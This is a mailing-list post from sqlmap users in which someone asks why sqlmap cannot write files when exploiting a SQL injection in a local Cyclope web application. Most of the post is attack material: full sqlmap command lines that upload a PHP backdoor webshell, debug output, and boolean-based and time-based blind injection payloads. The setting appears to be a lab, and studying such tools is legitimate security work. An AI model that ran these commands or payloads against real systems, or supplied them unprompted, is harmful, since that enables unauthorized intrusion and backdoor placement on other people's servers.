[sqlmap-users] File Write Error
From: Brian O. <br...@hu...> - 2014-03-21 03:44:51
Hello Everyone,

I'm attempting to use sqlmap to exploit a local installation of some software. I know it's vulnerable because it's on exploit-db & metasploit pops it every time (http://www.exploit-db.com/exploits/20501/).

I've had limited success with sqlmap, but I'm at the final stage now where I'm trying to use the sqli's I've found to upload a webshell via sqlmap. No dice... I'm getting an error stating "[ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server."

Other than the obvious, I'm not sure what this means because --os-shell and --os-cmd upload a file and execute just fine. Does --file-write need something special?

Here's the output:

root@kali:/usr/share/sqlmap# sqlmap -u " http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin" -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write /usr/share/webshells/php/simple-backdoor.php --file-dest progra~1/cyclope/ni4zlja=/backdoor.php -v3
...
[*] starting at 23:13:08

[23:13:08] [DEBUG] cleaning up configuration parameters
[23:13:08] [DEBUG] setting the HTTP timeout
[23:13:08] [DEBUG] setting the HTTP method to GET
[23:13:08] [DEBUG] creating HTTP requests opener object
[23:13:08] [DEBUG] forcing back-end DBMS to user defined value
[23:13:08] [DEBUG] setting the write file functionality
[23:13:08] [INFO] testing connection to the target URL
[23:13:08] [DEBUG] declared web page charset 'utf-8'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: username
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND 'yVaP'='yVaP&password=admin
    Vector: AND [INFERENCE]

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND 'OHln'='OHln&password=admin
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[23:13:08] [INFO] testing MySQL
[23:13:08] [INFO] confirming MySQL
[23:13:08] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL >= 5.0.0
[23:13:08] [INFO] fingerprinting the back-end DBMS operating system
[23:13:08] [INFO] the back-end DBMS operating system is Windows
[23:13:08] [ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server
[23:13:08] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/172.16.71.138'

[*] shutting down at 23:13:08

The results are the same when the cmdline is changed up for a POST version:

root@kali:/usr/share/sqlmap# sqlmap -u "http://172.16.71.138:7879/index.php" --data='act=auth-login&pag=login&username=admin&password=admin' -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write /usr/share/webshells/php/simple-backdoor.php --file-dest progra~1/cyclope/ni4zlja=/backdoor.php -v3

Any thoughts on what may be happening here would be much appreciated.

Thanks,
Brian